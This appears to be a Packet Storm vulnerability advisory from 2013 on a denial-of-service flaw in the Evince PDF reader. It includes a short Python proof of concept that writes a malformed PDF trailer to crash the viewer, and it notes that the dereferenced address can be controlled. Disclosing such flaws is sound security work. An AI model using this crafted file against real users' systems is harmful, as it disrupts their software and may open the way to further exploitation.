Evince PDF Reader 2.32.0.145 / 3.4.0 Denial Of Service

2013-10-03T00:00:00
ID PACKETSTORM:123505
Type packetstorm
Reporter Deva
Modified 2013-10-03T00:00:00

Description

                                        
                                            `Advisory Information :  
======================  
Title : Evince 2.32.0.145 - Denial Of Service  
Product : Evince pdf reader  
Vendor Homepage: https://projects.gnome.org/evince/  
Vulnerable Version(s) : Windows 2.32.0.145, Linux 3.4.0 and probably prior release  
Tested Version : Windows 2.32.0.145, Linux 3.4.0  
Tested On : Windows 7 & 8, Ubuntu 13.04  
Discovered By : Deva, Securimag Team  
  
Introduction :  
==============  
Evince is a document viewer for multiple document formats.  
The goal of evince is to replace the multiple document viewers that exist on the GNOME Desktop with a single simple application.  
  
- Copied from : https://projects.gnome.org/evince/  
  
Proof Of Concept :  
==================  
You can control dereferenced address by changing value of /Root (here 42)  
  
#!/usr/bin/python  
  
pdf = """trailer  
<<  
/Size 1337  
/Root 42 0 R  
>>  
startxref  
1  
%%EOF  
"""  
  
filename = "EvincePoC.pdf"  
file = open(filename,"w")  
file.writelines(pdf)  
file.close()  
  
`